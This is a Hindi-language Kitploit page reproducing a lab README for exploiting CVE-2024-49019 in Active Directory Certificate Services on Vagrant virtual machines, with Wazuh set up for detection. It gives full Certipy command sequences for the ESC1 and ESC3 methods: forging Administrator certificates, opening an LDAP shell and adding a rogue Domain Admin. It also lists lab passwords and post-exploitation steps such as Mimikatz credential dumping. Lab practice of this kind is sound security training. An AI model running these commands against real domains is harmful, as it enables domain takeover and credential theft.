Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-49019-rayng — CVE-2024-49019 के लिए शोषण | Kitploit
उपकरण/GitHubGitHub/rayngnpc/cve-2024-49019-rayng
विशेषाधिकार वृद्धिस्थायित्व तंत्रभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubrayngnpc/cve-2024-49019-rayng

CVE-2024-49019-rayng

CVE-2024-49019 के लिए शोषण

321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2024-49019 का शोषण: प्रमाणपत्र प्राधिकरण विशेषाधिकार वृद्धि

अवलोकन

CVE-2024-49019 Active Directory प्रमाणपत्र सेवाओं (AD CS) में एक भेद्यता है जो हमलावर को प्रमाणपत्र-आधारित प्रमाणीकरण का दुरुपयोग करके विशेषाधिकार बढ़ाने की अनुमति देती है। यह मार्गदर्शिका बताती है कि Certipy का उपयोग करके इस भेद्यता का शोषण कैसे किया जाए।


क्रेडेंशियल तालिका

वर्चुअल मशीनउपयोगकर्ता नामपासवर्ड
Windows Server 2022Administrator!@windowsadmintest101
Windows Server 2022testuser$Vulnerable139
Kali-VMvagrantvagrant
Ubuntu-Wazuhwazuhadmin

Ubuntu-Wazuh VM का उपयोग पहचान उद्देश्यों के लिए किया जाता है। पहचान मार्गदर्शिका शमन


चरण 1: रिपॉजिटरी क्लोन करें और वर्चुअल मशीनें सेट अप करें

पहले, आवश्यक फ़ाइलों वाली रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng

Vagrant स्थापित करें

आगे बढ़ने से पहले आपको अपनी होस्ट मशीन पर Vagrant स्थापित करना होगा।

Windows के लिए

Vagrant को यहाँ से डाउनलोड और इंस्टॉल करें, या PowerShell का उपयोग करके इंस्टॉल करें:

root@kitploit:~
choco install vagrant

Linux के लिए

root@kitploit:~
sudo apt update && sudo apt install vagrant -y

वर्चुअल मशीनें सेट अप करें

Windows Server 2022 VM

root@kitploit:~
cd windows-server2022
vagrant up

Kali Linux VM

root@kitploit:~
cd kali-VM
vagrant up

Wazuh Ubuntu VM

root@kitploit:~
cd WazuhUbuntu
vagrant up

चरण 2: वर्चुअल नेटवर्क कॉन्फ़िगर करें

चूंकि शोषण के लिए NAT नेटवर्क की आवश्यकता है, VirtualBox को इस प्रकार कॉन्फ़िगर करें:

Windows पर

नीचे कमांड चलाने से पहले, सुनिश्चित करें कि VBoxManage आपके पर्यावरण चर में जोड़ा गया है। यदि नहीं, तो कमांड को उसके पूर्ण पथ का उपयोग करके निष्पादित करें:

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

यदि VBoxManage पहचाना नहीं गया है, तो उपयोग करें:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Linux पर

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

सुनिश्चित करें कि VirtualBox में सभी VM की जांच करें और वे नेटवर्क एडाप्टर NatNetwork - NatNet1 को असाइन किए गए हैं। आप अलग नाम से NAT नेटवर्क बना सकते हैं, लेकिन यह IP रेंज 10.0.2.0/24 में होना चाहिए।


नोट: Wazuh सर्वर के लिए DNS सेट अप करने की अनुशंसा की जाती है। इस मामले में DNS: 10.0.2.1 होना चाहिए - कभी-कभी इंटरनेट के बिना API जांच विफल हो जाएगी और आप Wazuh डैशबोर्ड में प्रवेश नहीं कर सकते।

चरण 3: होस्ट्स फ़ाइल संशोधित करें

आगे बढ़ने से पहले, सुनिश्चित करें कि सभी VM चालू हैं।

हमला शुरू करने के लिए Kali Linux VM तक पहुंचें और अपनी /etc/hosts फ़ाइल अपडेट करें:

root@kitploit:~
sudo nano /etc/hosts

निम्न प्रविष्टि जोड़ें:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

सहेजें और बाहर निकलें।


चरण 4: पर्यावरण सेट अप करें

CVE-49019 निर्देशिका पर जाएं और Python वर्चुअल वातावरण सक्रिय करें:

root@kitploit:~
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate

चरण 5: शोषण विधियाँ

इस भेद्यता का शोषण करने के दो तरीके हैं: ESC1 और ESC3।

ESC1 विधि

कमजोर टेम्पलेट ढूंढें

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout

प्रमाणपत्र का अनुरोध करें

root@kitploit:~
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'

LDAP शेल एक्सेस के लिए प्रमाणपत्र का उपयोग करें

root@kitploit:~
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121

नया उपयोगकर्ता जोड़ें

root@kitploit:~
add_user badadmin

उपयोगकर्ता को डोमेन व्यवस्थापक समूह में जोड़ें

root@kitploit:~
add_user_to_group badadmin "Domain Admins"

ESC3 विधि

कमजोर टेम्पलेट ढूंढें

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout

परीक्षण उपयोगकर्ता से प्रमाणपत्र का अनुरोध करें

root@kitploit:~
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121

testuser प्रमाणपत्र का उपयोग करके डोमेन व्यवस्थापक के लिए प्रमाणपत्र का अनुरोध करें

root@kitploit:~
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121

यह वह जगह है जहां यह विधि ESC1 से भिन्न है, जहां यह PKINIT का अनुरोध कर सकता है और TGT से हैश प्राप्त कर सकता है

root@kitploit:~
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121

नोट: यदि आपको त्रुटि मिलती है: while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

एक समाधान है, सुनिश्चित करें कि आपकी होस्ट मशीन का समय Windows सर्वर के समान हो। Kali-Linux VM को Windows-Server के समान अद्यतन करने के लिए यह कमांड करना सुनिश्चित करें:

root@kitploit:~
sudo timedatectl set-ntp off

sudo rdate -n 10.0.2.121

सुनिश्चित करें कि Windows-Server का समय-क्षेत्र होस्ट मशीन के समान हो। ध्यान दें कि संगठन के कारण इसे संशोधित नहीं किया जा सकता है। कृपया होस्ट मशीन से मेल करने के लिए डेटा टाइम ज़ोन में जाकर मैन्युअल रूप से बदलें। Kali-VM और Windows Server का समय होस्ट मशीन के समान होना चाहिए।

आप नीचे दिए गए कमांड का उपयोग करके इसे समय सिंक करने के लिए बाध्य कर सकते हैं:

root@kitploit:~
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update

व्यवस्थापक पहुंच प्राप्त करने के लिए प्रमाणपत्र का उपयोग करें

root@kitploit:~
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121

चरण 6: शोषण के बाद आप क्या कर सकते हैं?

एक बार व्यवस्थापक-स्तरीय पहुंच प्राप्त हो जाने पर, हमलावर यह कर सकता है:

  • उपयोगकर्ता खाते बनाना और प्रबंधित करना
    root@kitploit:~
    net user hacked /add
    net localgroup "Administrators" hacked /add
    
  • Mimikatz का उपयोग करके क्रेडेंशियल डंप करना:
    root@kitploit:~
    sekurlsa::logonpasswords
    
  • Impacket का उपयोग करके Secretdump
  • Windows सर्वर शेल तक पहुंचने के लिए Wmiexec
  • Windows Server Administrator को BloodyAD का उपयोग करके बदलना
  • नेटवर्क के भीतर पिवट और पार्श्व गति करना
  • स्थिरता स्थापित करना
  • संवेदनशील डेटा निकालना

पहचान और शमन रणनीतियों के लिए, पहचान मार्गदर्शिका देखें।


निष्कर्ष

CVE-2024-49019 अनधिकृत विशेषाधिकार वृद्धि की अनुमति देने की अपनी क्षमता के कारण एक महत्वपूर्ण सुरक्षा जोखिम प्रस्तुत करता है। इस भेद्यता को समझना और Wazuh जैसे उचित पहचान तंत्र को तैनात करना, Active Directory वातावरण को सुरक्षित करने के लिए महत्वपूर्ण है।

AD CS को सुरक्षित करने के बारे में अधिक जानकारी के लिए, Microsoft Security CVE-2024-49019 देखें।

टूल डाउनलोड करें